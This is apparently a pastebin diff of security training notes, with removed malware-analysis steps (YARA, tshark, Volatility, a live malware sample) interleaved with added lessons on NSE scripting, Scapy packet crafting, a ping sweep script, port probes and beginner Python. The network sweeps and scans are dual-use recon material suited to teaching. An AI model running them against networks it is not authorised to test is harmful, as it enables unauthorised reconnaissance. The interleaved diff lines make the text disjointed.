535 | https://thesprawl.org/research/writing-nse-scripts-for-vulnerability-scanning/ | |
536 | ||
537 | ---------------------------------------------------------------------- | |
538 | sudo vi /usr/share/nmap/scripts/intro-nse.nse | |
539 | strategicsec | |
540 | ||
541 | ||
542 | ||
543 | -- The Head Section -- | |
544 | -- The Rule Section -- | |
545 | portrule = function(host, port) | |
546 | return port.protocol == "tcp" | |
547 | and port.number == 80 | |
548 | and port.state == "open" | |
549 | end | |
550 | ||
551 | -- The Action Section -- | |
552 | action = function(host, port) | |
553 | return "I love Linux!" | |
554 | end | |
555 | ---------------------------------------------------------------------- | |
556 | ||
557 | - Ok, now that we've made that change let's run the script | |
558 | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse strategicsec.com -p 22,80,443 | |
559 | ||
560 | ||
561 | ||
562 | ||
563 | ||
564 | ||
565 | ---------------------------------------------------------------------- | |
566 | sudo vi /usr/share/nmap/scripts/intro-nse.nse | |
567 | ||
568 | -- The Head Section -- | |
569 | local shortport = require "shortport" | |
570 | ||
571 | -- The Rule Section -- | |
572 | portrule = shortport.http | |
573 | ||
574 | ||
575 | -- The Action Section -- | |
576 | action = function(host, port) | |
577 | return "I still love Linux!" | |
578 | end | |
579 | ---------------------------------------------------------------------- | |
580 | ||
581 | - Ok, now that we've made that change let's run the script | |
582 | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse strategicsec.com -p 22,80,443 | |
583 | ||
584 | ||
585 | ||
586 | ||
587 | ||
588 | ||
589 | ||
590 | OK, now let's have some fun with my buddy Carlos Perez's website which you should have been looking at quite a lot if you were trying to get Ruby 2.1.5 working. | |
591 | ||
592 | ---------------------------------------------------------------------- | |
593 | sudo vi /usr/share/nmap/scripts/intro-nse.nse | |
594 | ||
595 | -- The Head Section -- | |
596 | local shortport = require "shortport" | |
597 | local http = require "http" | |
598 | ||
599 | -- The Rule Section -- | |
600 | portrule = shortport.http | |
601 | ||
602 | -- The Action Section -- | |
603 | action = function(host, port) | |
604 | ||
605 | local uri = "/installing-metasploit-in-ubunt/" | |
606 | local response = http.get(host, port, uri) | |
607 | return response.status | |
608 | ||
609 | end | |
610 | ---------------------------------------------------------------------- | |
611 | ||
612 | - Ok, now that we've made that change let's run the script | |
613 | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443 | |
614 | ||
615 | ||
616 | ||
617 | ||
618 | ---------------------------------------------------------------------- | |
619 | sudo vi /usr/share/nmap/scripts/intro-nse.nse | |
620 | ||
621 | -- The Head Section -- | |
622 | local shortport = require "shortport" | |
623 | local http = require "http" | |
624 | ||
625 | -- The Rule Section -- | |
626 | portrule = shortport.http | |
627 | ||
628 | -- The Action Section -- | |
629 | action = function(host, port) | |
630 | ||
631 | local uri = "/installing-metasploit-in-ubunt/" | |
632 | local response = http.get(host, port, uri) | |
633 | ||
634 | if ( response.status == 200 ) then | |
635 | return response.body | |
636 | end | |
637 | ||
638 | end | |
639 | ---------------------------------------------------------------------- | |
640 | ||
641 | - Ok, now that we've made that change let's run the script | |
642 | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443 | |
643 | ||
644 | ||
645 | ||
646 | ||
647 | ||
648 | ||
649 | ||
650 | ||
651 | ||
652 | ---------------------------------------------------------------------- | |
653 | sudo vi /usr/share/nmap/scripts/intro-nse.nse | |
654 | ||
655 | -- The Head Section -- | |
656 | local shortport = require "shortport" | |
657 | local http = require "http" | |
658 | local string = require "string" | |
659 | ||
660 | -- The Rule Section -- | |
661 | portrule = shortport.http | |
662 | ||
663 | -- The Action Section -- | |
664 | action = function(host, port) | |
665 | ||
666 | local uri = "/installing-metasploit-in-ubunt/" | |
667 | local response = http.get(host, port, uri) | |
668 | ||
669 | if ( response.status == 200 ) then | |
670 | local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian") | |
671 | return title | |
672 | end | |
673 | ||
674 | end | |
675 | ---------------------------------------------------------------------- | |
676 | ||
677 | - Ok, now that we've made that change let's run the script | |
678 | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443 | |
679 | ||
680 | ||
681 | ||
682 | ||
683 | ||
684 | ||
685 | ||
686 | ---------------------------------------------------------------------- | |
687 | sudo vi /usr/share/nmap/scripts/intro-nse.nse | |
688 | ||
689 | -- The Head Section -- | |
690 | local shortport = require "shortport" | |
691 | local http = require "http" | |
692 | local string = require "string" | |
693 | ||
694 | -- The Rule Section -- | |
695 | portrule = shortport.http | |
696 | ||
697 | -- The Action Section -- | |
698 | action = function(host, port) | |
699 | ||
700 | local uri = "/installing-metasploit-in-ubunt/" | |
701 | local response = http.get(host, port, uri) | |
702 | ||
703 | if ( response.status == 200 ) then | |
704 | local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian") | |
705 | ||
706 | if (title) then | |
707 | return "Vulnerable" | |
708 | else | |
709 | return "Not Vulnerable" | |
710 | end | |
711 | end | |
712 | end | |
713 | ||
714 | ---------------------------------------------------------------------- | |
715 | ||
716 | - Ok, now that we've made that change let's run the script | |
717 | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443 | |
718 | ||
719 | ||
720 | ||
721 | #################### | |
722 | # Installing Scapy # | |
723 | #################### | |
724 | ||
725 | sudo apt-get update | |
726 | sudo apt-get install python-scapy python-pyx python-gnuplot python-pycryptopp python-pycryptopp-dbg python-crypto python-crypto-dbg python-cryptography | |
727 | ||
728 | ||
729 | - Reference Page For All Of The Commands We Will Be Running: | |
730 | http://samsclass.info/124/proj11/proj17-scapy.html | |
731 | ||
732 | ||
733 | ||
734 | ||
735 | ||
736 | - To run Scapy interactively | |
737 | ||
738 | sudo scapy | |
739 | ||
740 | ||
741 | ||
742 | ##################################### | |
743 | # Sending ICMPv4 Packets with scapy # | |
744 | ##################################### | |
745 | ||
746 | - In the Linux machine, in the Terminal window, at the >>> prompt, type this command, and then press the Enter key: | |
747 | ||
748 | i = IP() | |
749 | ||
750 | ||
751 | ||
752 | ||
753 | - This creates an object named i of type IP. To see the properties of that object, use the display() method with this command: | |
754 | ||
755 | i.display() | |
756 | ||
757 | ||
758 | ||
759 | ||
760 | - Use these commands to set the destination IP address and display the properties of the i object again. Replace the IP address in the first command with the IP address of your target Windows machine: | |
761 | ||
762 | i.dst="192.168.54.184" | |
763 | ||
764 | i.display() | |
765 | ||
766 | ||
767 | ||
768 | ||
769 | - Notice that scapy automatically fills in your machine's source IP address. | |
770 | ||
771 | - Use these commands to create an object named ic of type ICMP and display its properties: | |
772 | ||
773 | ||
774 | ic = ICMP() | |
775 | ||
776 | ic.display() | |
777 | ||
778 | ||
779 | ||
780 | ||
781 | ||
782 | - Use this command to send the packet onto the network and listen to a single packet in response. Note that the third character is the numeral 1, not a lowercase L: | |
783 | ||
784 | sr1(i/ic) | |
785 | ||
786 | ||
787 | ||
788 | ||
789 | ||
790 | - This command sends and receives one packet, of type IP at layer 3 and ICMP at layer 4. | |
791 | ||
792 | ||
793 | - The Padding section shows the portion of the packet that carries higher-level data. In this case it contains only zeroes as padding. | |
794 | ||
795 | - Use this command to send a packet that is IP at layer 3, ICMP at layer 4, and that contains data with your name in it (replace YOUR NAME with your own name): | |
796 | ||
797 | ||
798 | sr1(i/ic/"YOUR NAME") | |
799 | ||
800 | ||
801 | - You should see a reply with a Raw section containing your name. | |
802 | ||
803 | ||
804 | ||
805 | ################################### | |
806 | # Sending a UDP Packet with Scapy # | |
807 | ################################### | |
808 | ||
809 | ||
810 | - Preparing the Target | |
811 | $ ncat -ulvp 4444 | |
812 | ||
813 | ||
814 | ||
815 | ||
816 | --open another terminal-- | |
817 | In the Linux machine, in the Terminal window, at the >>> prompt, type these commands, and then press the Enter key: | |
818 | ||
819 | u = UDP() | |
820 | ||
821 | u.display() | |
822 | ||
823 | ||
824 | ||
825 | - This creates an object named u of type UDP, and displays its properties. | |
826 | ||
827 | - Execute these commands to change the destination port to 4444 and display the properties again: | |
828 | ||
829 | i.dst="192.168.54.184" <--- replace this with a host that you can run netcat on (ex: another VM or your host computer) | |
830 | ||
831 | u.dport = 4444 | |
832 | ||
833 | u.display() | |
834 | ||
835 | ||
836 | ||
837 | - Execute this command to send the packet to the Windows machine: | |
838 | ||
839 | send(i/u/"YOUR NAME SENT VIA UDP\n") | |
840 | ||
841 | ||
842 | ||
843 | - On the Windows target, you should see the message appear | |
844 | ||
845 | ||
846 | p = sr1(IP(dst="8.8.8.8")/UDP()/DNS(rd=1,qd=DNSQR(qname="strategicsec.com"))) | |
847 | ||
848 | ||
849 | p=sr(IP(dst="192.168.230.2")/TCP(dport=[23,80,53,443])) | |
850 | ||
851 | ||
852 | p=sr(IP(dst="192.168.230.2")/TCP(dport=[80])) | |
853 | ||
854 | ||
855 | traceroute (["strategicsec.com"], maxttl=20) | |
856 | This is actually an ICMP & TCP traceroute, default destination is port 80 | |
857 | ||
858 | ||
859 | traceroute (["strategicsec.com"], dport=443, maxttl=20) | |
860 | ||
861 | ||
862 | ||
863 | ############################ | |
864 | # Ping Sweeping with Scapy # | |
865 | ############################ | |
866 | ||
867 | ---------------------------------------------------------------------- | |
868 | vi scapy-pingsweep.py | |
869 | ||
870 | ||
871 | #!/usr/bin/python | |
872 | from scapy.all import * | |
873 | ||
874 | TIMEOUT = 2 | |
875 | conf.verb = 0 | |
876 | for ip in range(0, 256): | |
877 | packet = IP(dst="192.168.1." + str(ip), ttl=20)/ICMP() | |
878 | reply = sr1(packet, timeout=TIMEOUT) | |
879 | if not (reply is None): | |
880 | print reply.dst, "is online" | |
881 | else: | |
882 | print "Timeout waiting for %s" % packet[IP].dst | |
883 | ---------------------------------------------------------------------- | |
884 | ||
885 | ||
886 | ############################################### | |
887 | # Checking out some scapy based port scanners # | |
888 | ############################################### | |
889 | ||
890 | wget https://s3.amazonaws.com/SecureNinja/Python/rdp_scan.py | |
891 | ||
892 | cat rdp_scan.py | |
893 | ||
894 | sudo python rdp_scan.py 192.168.1.250 | |
895 | ||
896 | ||
897 | ######################################### | |
898 | # Here is the courseware for this month # | |
899 | ######################################### | |
900 | ||
901 | Class powerpoint slides: | |
902 | https://s3.amazonaws.com/StrategicSec-Files/Python/PythonV3-1.pptx | |
903 | ||
904 | ||
905 | ||
906 | Courseware Lab Manual | |
907 | https://s3.amazonaws.com/StrategicSec-Files/Python/Python-For-InfoSec-Pros-2015.pdf | |
908 | ||
909 | ||
910 | ||
911 | https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip | |
912 | user: infosecaddicts | |
913 | pass: infosecaddicts | |
914 | ||
915 | ||
916 | The youtube video playlist that I'd like for you to watch is located here: | |
917 | https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA | |
918 | ||
919 | ||
920 | - | Log in to your Ubuntu system with the username 'malware' and the password 'malware'. |
920 | + | |
921 | # Installing Python# | |
922 | - | After logging please open a terminal window and type the following commands: |
922 | + | |
923 | Windows | |
924 | 32-Bit Version | |
925 | http://www.python.org/ftp/python/2.7.5/python-2.7.5.msi | |
926 | ||
927 | - | This is actual Malware (remmeber to run it in a VM - the password to extract it is 'infected': |
927 | + | 64-Bit Version |
928 | http://www.python.org/ftp/python/2.7.5/python-2.7.5.amd64.msi | |
929 | ||
930 | - | wget http://www.beenuarora.com/code/analyse_malware.py |
930 | + | After you install Python in Windows the next thing you may want to install is IdleX: |
931 | http://idlex.sourceforge.net/features.html | |
932 | ||
933 | - | infected |
933 | + | |
934 | Linux | |
935 | Debian/Ubuntu: sudo apt-get install -y python | |
936 | RHEL/CentOS/Fedora: sudo yum install -y python | |
937 | ||
938 | After you install Python in Linux the next thing that you will need to do is install idle. | |
939 | ||
940 | sudo apt-get install -y idle | |
941 | ||
942 | Open IDLE, and let's just dive right in. | |
943 | ||
944 | ||
945 | ||
946 | - | Reference: http://www.garykessler.net/library/file_sigs.html |
946 | + | |
947 | ############################# | |
948 | # Lesson 1: Simple Printing # | |
949 | ############################# | |
950 | ||
951 | >>> print "Today we are learning Python." | |
952 | ||
953 | ||
954 | ||
955 | ||
956 | ||
957 | ||
958 | ##################################### | |
959 | # Lesson 2: Simple Numbers and Math # | |
960 | ##################################### | |
961 | ||
962 | >>> 2+2 | |
963 | ||
964 | >>> 6-3 | |
965 | - | - We didn't see anything like HKLM, HKCU or other registry type stuff |
965 | + | |
966 | >>> 18/7 | |
967 | ||
968 | >>> 18.0/7 | |
969 | - | strings malware.exe | grep -i join |
969 | + | |
970 | >>> 18.0/7.0 | |
971 | ||
972 | >>> 18/7 | |
973 | ||
974 | >>> 9%4 | |
975 | ||
976 | - | - List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands |
976 | + | >>> 8%4 |
977 | ||
978 | >>> 8.75%.5 | |
979 | ||
980 | >>> 6.*7 | |
981 | ||
982 | >>> 6*6*6 | |
983 | ||
984 | >>> 6**3 | |
985 | ||
986 | >>> 5**12 | |
987 | ||
988 | >>> -5**4 | |
989 | ||
990 | ||
991 | ||
992 | ||
993 | ||
994 | ||
995 | ####################### | |
996 | # Lesson 3: Variables # | |
997 | ####################### | |
998 | ||
999 | >>> x=18 | |
1000 | ||
1001 | >>> x+15 | |
1002 | ||
1003 | >>> x**3 | |
1004 | - | infected |
1004 | + | |
1005 | >>> y=54 | |
1006 | ||
1007 | >>> x+y | |
1008 | ||
1009 | >>> g=input("Enter number here: ") | |
1010 | 43 | |
1011 | ||
1012 | >>> g+32 | |
1013 | ||
1014 | - | Step 1: Installing MySQL database |
1014 | + | >>> g**3 |
1015 | ||
1016 | ||
1017 | ||
1018 | - | |
1018 | + | |
1019 | - | Step 2: Installing Python MySQLdb module |
1019 | + | |
1020 | ||
1021 | ||
1022 | ||
1023 | ################################### | |
1024 | # Lesson 4: Modules and Functions # | |
1025 | ################################### | |
1026 | ||
1027 | >>> 5**4 | |
1028 | - | mysql -u root -p (set a password of 'malware') |
1028 | + | |
1029 | >>> pow(5,4) | |
1030 | - | Then create one database by running following command: |
1030 | + | |
1031 | >>> abs(-18) | |
1032 | ||
1033 | >>> abs(5) | |
1034 | ||
1035 | >>> floor(18.7) | |
1036 | ||
1037 | >>> import math | |
1038 | - | vi mal_to_db.py -i (fill in database connection information) |
1038 | + | |
1039 | >>> math.floor(18.7) | |
1040 | ||
1041 | >>> math.sqrt(81) | |
1042 | - | python mal_to_db.py -i -f malware.exe -u |
1042 | + | |
1043 | >>> joe = math.sqrt | |
1044 | ||
1045 | >>> joe(9) | |
1046 | - | malware |
1046 | + | |
1047 | >>> joe=math.floor | |
1048 | ||
1049 | >>> joe(19.8) | |
1050 | ||
1051 | ||
1052 | ||
1053 | ||
1054 | ||
1055 | ||
1056 | ||
1057 | ################################## | |
1058 | - | ############################## |
1058 | + | # Lesson 5: How to Save Programs # |
1059 | - | # Lesson 32: Setting up Yara # |
1059 | + | ################################## |
1060 | - | ############################## |
1060 | + | Run "IDLE (Python GUI)" |
1061 | ||
1062 | File -> New Window | |
1063 | - | sudo apt-get install clamav clamav-freshclam |
1063 | + | |
1064 | print "Python for InfoSec" | |
1065 | - | sudo freshclam |
1065 | + | |
1066 | File -> Save as | |
1067 | - | sudo Clamscan |
1067 | + | py4InfoSec.py |
1068 | ||
1069 | - | sudo apt-get install libpcre3 libpcre3-dev |
1069 | + | Run -> Run Module or Press "F5" |
1070 | ||
1071 | - | wget https://github.com/plusvic/yara/archive/v3.1.0.tar.gz |
1071 | + | |
1072 | ||
1073 | - | wget http://yara-project.googlecode.com/files/yara-python-1.4.tar.gz |
1073 | + | |
1074 | ||
1075 | - | tar -zxvf v3.1.0.tar.gz |
1075 | + | Create a file name.py |
1076 | ||
1077 | - | cd yara-3.1.0/ |
1077 | + | x = raw_input("Enter name: ") |
1078 | print "Hey " + x | |
1079 | raw_input("Press<enter>") | |
1080 | ||
1081 | ||
1082 | Run -> Run Module or Press "F5" | |
1083 | ||
1084 | ||
1085 | - | make check |
1085 | + | |
1086 | ||
1087 | ||
1088 | ||
1089 | - | cd yara-python/ |
1089 | + | |
1090 | ||
1091 | - | python setup.py build |
1091 | + | ##################### |
1092 | # Lesson 6: Strings # | |
1093 | ##################### | |
1094 | ||
1095 | >>> "XSS" | |
1096 | ||
1097 | >>> 'SQLi' | |
1098 | ||
1099 | - | wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/3/clamav_to_yara.py |
1099 | + | >>> "Joe's a python lover" |
1100 | ||
1101 | - | sigtool -u /var/lib/clamav/main.cvd |
1101 | + | >>> 'Joe\'s a python lover' |
1102 | ||
1103 | - | python clamav_to_yara.py -f main.ndb -o clamav.yara |
1103 | + | >>> "Joe said \"InfoSec is fun\" to me" |
1104 | ||
1105 | >>> a = "Joe" | |
1106 | ||
1107 | >>> b = "McCray" | |
1108 | - | infected |
1108 | + | |
1109 | >>> a, b | |
1110 | - | mkdir malcode/ |
1110 | + | |
1111 | >>> a+b | |
1112 | - | mv malware.exe malcode/ |
1112 | + | |
1113 | ||
1114 | - | vi testrule.yara |
1114 | + | |
1115 | ||
1116 | - | rule IsPE |
1116 | + | |
1117 | - | { |
1117 | + | |
1118 | - | meta: |
1118 | + | |
1119 | - | description = "Windows executable file" |
1119 | + | |
1120 | ########################## | |
1121 | - | condition: |
1121 | + | # Lesson 7: More Strings # |
1122 | - | // MZ signature at offset 0 and ... |
1122 | + | |
1123 | - | uint16(0) == 0x5A4D and |
1123 | + | |
1124 | - | // ... PE signature at offset stored in MZ header at 0x3C |
1124 | + | >>> num = 10 |
1125 | - | uint32(uint32(0x3C)) == 0x00004550 |
1125 | + | |
1126 | - | } |
1126 | + | >>> num + 2 |
1127 | ||
1128 | - | rule has_no_DEP |
1128 | + | >>> "The number of open ports found on this system is " + num |
1129 | - | { |
1129 | + | |
1130 | - | meta: |
1130 | + | >>> num = str(18) |
1131 | - | description = "DEP is not enabled" |
1131 | + | |
1132 | >>> "There are " + num + " vulnerabilities found in this environment." | |
1133 | - | condition: |
1133 | + | |
1134 | - | IsPE and |
1134 | + | >>> num2 = 46 |
1135 | - | uint16(uint32(0x3C)+0x5E) & 0x00100 == 0 |
1135 | + | |
1136 | - | } |
1136 | + | >>> "As of 08/20/2012, the number of states that enacted the Security Breach Notification Law is " + `num2` |
1137 | ||
1138 | - | rule has_no_ASLR |
1138 | + | |
1139 | - | { |
1139 | + | |
1140 | - | meta: |
1140 | + | |
1141 | - | description = "ASLR is not enabled" |
1141 | + | |
1142 | ||
1143 | - | condition: |
1143 | + | |
1144 | - | IsPE and |
1144 | + | |
1145 | - | uint16(uint32(0x3C)+0x5E) & 0x0040 == 0 |
1145 | + | ####################### |
1146 | - | } |
1146 | + | # Lesson 8: Raw Input # |
1147 | ####################### | |
1148 | Run "IDLE (Python GUI)" | |
1149 | ||
1150 | - | yara testrule.yara malcode/malware.exe |
1150 | + | File -> New Window |
1151 | ||
1152 | - | mkdir rules/ |
1152 | + | joemccray=input("Enter name: ") |
1153 | print joemccray | |
1154 | - | cd rules/ |
1154 | + | |
1155 | ||
1156 | - | wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/5/capabilities.yara |
1156 | + | |
1157 | Run -> Run Module # Will throw an error | |
1158 | - | wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/6/magic.yara |
1158 | + | or |
1159 | Press "F5" | |
1160 | - | wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/4/packer.yara |
1160 | + | |
1161 | File -> New Window | |
1162 | joemccray=raw_input("Enter name: ") | |
1163 | ||
1164 | - | yara rules/ malcode/malware.exe |
1164 | + | Run -> Run Module # Will throw an error |
1165 | ||
1166 | - | wget https://github.com/Xen0ph0n/YaraGenerator/archive/master.zip |
1166 | + | or |
1167 | ||
1168 | Press "F5" | |
1169 | ||
1170 | - | cd YaraGenerator-master/ |
1170 | + | NOTE: |
1171 | Use "input() for integers and expressions, and use raw_input() when you are dealing with strings. | |
1172 | - | python yaraGenerator.py ../malcode/ -r Test-Rule-2 -a "Joe McCray" -d "Test Rule Made With Yara Generator" -t "TEST" -f "exe" |
1172 | + | |
1173 | ||
1174 | - | cat Test-Rule-2.yar |
1174 | + | |
1175 | ||
1176 | - | wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe |
1176 | + | |
1177 | ||
1178 | - | yara Test-Rule-2.yar putty.exe |
1178 | + | |
1179 | ################################# | |
1180 | # Lesson 9: Sequences and Lists # | |
1181 | ################################# | |
1182 | ||
1183 | >>> attacks = ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include'] | |
1184 | - | # Additional Tasks # |
1184 | + | |
1185 | >>> attacks | |
1186 | ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include'] | |
1187 | - | - PE Scanner: |
1187 | + | |
1188 | - | https://malwarecookbook.googlecode.com/svn/trunk/3/8/pescanner.py |
1188 | + | >>> attacks[3] |
1189 | - | http://www.beenuarora.com/code/analyse_malware.py |
1189 | + | 'SQL Injection' |
1190 | ||
1191 | - | - AV submission: |
1191 | + | >>> attacks[-2] |
1192 | - | http://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py |
1192 | + | 'Cross-Site Scripting' |
1193 | - | https://raw.githubusercontent.com/dcmorton/MalwareTools/master/vtsubmit.py |
1193 | + | |
1194 | ||
1195 | - | - Malware Database Creation: |
1195 | + | |
1196 | - | https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py |
1196 | + | |
1197 | ||
1198 | ||
1199 | ########################## | |
1200 | # Level 10: If Statement # | |
1201 | - | cd /home/malware/Desktop/Browser\ Forensics |
1201 | + | |
1202 | Run "IDLE (Python GUI)" | |
1203 | - | ls | grep pcap |
1203 | + | |
1204 | File -> New Window | |
1205 | - | perl chaosreader.pl suspicious-time.pcap |
1205 | + | attack="SQLI" |
1206 | if attack=="SQLI": | |
1207 | - | firefox index.html |
1207 | + | print 'The attacker is using SQLI' |
1208 | ||
1209 | - | cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" |
1209 | + | |
1210 | ||
1211 | - | cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr |
1211 | + | Run -> Run Module or Press "F5" |
1212 | ||
1213 | - | sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs |
1213 | + | File >> New Window |
1214 | attack="XSS" | |
1215 | if attack=="SQLI": | |
1216 | print 'The attacker is using SQLI' | |
1217 | ||
1218 | - | for i in session_00[0-9]*.www.html; do srcip=`cat "$i" | grep 'www:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'www:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u |
1218 | + | |
1219 | Run -> Run Module or Press "F5" | |
1220 | ||
1221 | - | tshark -r suspicious-time.pcap | grep 'NB.*20\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u |
1221 | + | |
1222 | ||
1223 | ############################# | |
1224 | - | tshark -r suspicious-time.pcap | grep 'NB.*1e\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u |
1224 | + | # Reference Videos To Watch # |
1225 | ############################# | |
1226 | Here is your first set of youtube videos that I'd like for you to watch: | |
1227 | - | tshark -r suspicious-time.pcap arp | grep has | awk '{print $3," -> ",$9}' | tr -d '?' |
1227 | + | https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 1-10) |
1228 | ||
1229 | ||
1230 | - | tshark –r suspicious-time.pcap -Tfields -e “eth.src” | sort | uniq |
1230 | + | |
1231 | ||
1232 | ||
1233 | - | tshark -r suspicious-time.pcap -R "browser.command==1" -Tfields -e "ip.src" -e "browser.server" | uniq |
1233 | + | #################################### |
1234 | # Lesson 11: Intro to Log Analysis # | |
1235 | - | tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort |uniq |
1235 | + | #################################### |
1236 | ||
1237 | - | tshark -r suspicious-time.pcap -qz ip_hosts,tree |
1237 | + | Login to your StrategicSec Ubuntu machine. You can download the VM from the following link: |
1238 | ||
1239 | - | tshark -r suspicious-time.pcap -R "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq |
1239 | + | https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip |
1240 | user: infosecaddicts | |
1241 | - | tshark -r suspicious-time.pcap -R "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name" |
1241 | + | pass: infosecaddicts |
1242 | ||
1243 | Then execute the following commands: | |
1244 | - | whois rapidshare.com.eyu32.ru |
1244 | + | --------------------------------------------------------------------------------------------------------- |
1245 | ||
1246 | - | whois sploitme.com.cn |
1246 | + | NOTE: If you are still in your python interpreter then you must type exit() to get back to a regular command-prompt. |
1247 | ||
1248 | wget https://s3.amazonaws.com/SecureNinja/Python/access_log | |
1249 | ||
1250 | ||
1251 | cat access_log | grep 141.101.80.188 | |
1252 | - | tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' |
1252 | + | |
1253 | cat access_log | grep 141.101.80.187 | |
1254 | - | tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org' |
1254 | + | |
1255 | cat access_log | grep 108.162.216.204 | |
1256 | - | tshark -r suspicious-time.pcap -qz http_req,tree |
1256 | + | |
1257 | cat access_log | grep 173.245.53.160 | |
1258 | - | tshark -r suspicious-time.pcap -R "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst |
1258 | + | |
1259 | --------------------------------------------------------- | |
1260 | - | tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g' |
1260 | + | |
1261 | Google the following terms: | |
1262 | - Python read file | |
1263 | - Python read line | |
1264 | - Python read from file | |
1265 | ||
1266 | ||
1267 | ||
1268 | ||
1269 | ######################################################## | |
1270 | # Lesson 12: Use Python to read in a file line by line # | |
1271 | ######################################################## | |
1272 | ||
1273 | - | ***Takes a few min*** |
1273 | + | |
1274 | Reference: | |
1275 | http://cmdlinetips.com/2011/08/three-ways-to-read-a-text-file-line-by-line-in-python/ | |
1276 | ||
1277 | - | cd foremost-1.5.7/ |
1277 | + | |
1278 | ||
1279 | --------------------------------------------------------- | |
1280 | vi logread1.py | |
1281 | ||
1282 | ||
1283 | ## Open the file with read only permit | |
1284 | f = open('access_log', "r") | |
1285 | ||
1286 | ## use readlines to read all lines in the file | |
1287 | ## The variable "lines" is a list containing all lines | |
1288 | lines = f.readlines() | |
1289 | ||
1290 | print lines | |
1291 | ||
1292 | ||
1293 | ## close the file after reading the lines. | |
1294 | f.close() | |
1295 | ||
1296 | --------------------------------------------------------- | |
1297 | ||
1298 | ||
1299 | Google the following: | |
1300 | - python difference between readlines and readline | |
1301 | - python readlines and readline | |
1302 | ||
1303 | ||
1304 | ||
1305 | - | python volatility hivescan -f ../hn_forensics.vmem |
1305 | + | |
1306 | ||
1307 | - | for file in $(ls *.dmp); do echo $file; strings $file | grep bankofamerica; done |
1307 | + | ################################ |
1308 | # Lesson 13: A quick challenge # | |
1309 | ################################ | |
1310 | ||
1311 | Can you write an if/then statement that looks for this IP and print "Found it"? | |
1312 | ||
1313 | ||
1314 | 141.101.81.187 | |
1315 | ||
1316 | ||
1317 | ||
1318 | ||
1319 | ||
1320 | ||
1321 | --------------------------------------------------------- | |
1322 | Hint 1: Use Python to look for a value in a list | |
1323 | ||
1324 | Reference: | |
1325 | http://www.wellho.net/mouth/1789_Looking-for-a-value-in-a-list-Python.html | |
1326 | ||
1327 | ||
1328 | ||
1329 | ||
1330 | --------------------------------------------------------- | |
1331 | Hint 2: Use Python to prompt for user input | |
1332 | ||
1333 | Reference: | |
1334 | http://www.cyberciti.biz/faq/python-raw_input-examples/ | |
1335 | ||
1336 | ||
1337 | ||
1338 | ||
1339 | --------------------------------------------------------- | |
1340 | Hint 3: Use Python to search for a string in a list | |
1341 | ||
1342 | Reference: | |
1343 | http://stackoverflow.com/questions/4843158/check-if-a-python-list-item-contains-a-string-inside-another-string | |
1344 | ||
1345 | ||
1346 | ||
1347 | ||
1348 | ||
1349 | Here is my solution: | |
1350 | ------------------- | |
1351 | $ python | |
1352 | >>> f = open('access_log', "r") | |
1353 | >>> lines = f.readlines() | |
1354 | >>> ip = '141.101.81.187' | |
1355 | >>> for string in lines: | |
1356 | ... if ip in string: | |
1357 | ... print(string) | |
1358 | ||
1359 | ||
1360 | ||
1361 | ||
1362 | Here is one student's solution - can you please explain each line of this code to me? | |
1363 | ------------------------------------------------------------------------------------- | |
1364 | #!/usr/bin/python | |
1365 | ||
1366 | f = open('access_log') | |
1367 | ||
1368 | strUsrinput = raw_input("Enter IP Address: ") | |
1369 | ||
1370 | for line in iter(f): | |
1371 | ip = line.split(" - ")[0] | |
1372 | if ip == strUsrinput: | |
1373 | print line | |
1374 | ||
1375 | f.close() | |
1376 | ||
1377 | ||
1378 | ||
1379 | ||
1380 | ------------------------------- | |
1381 | ||
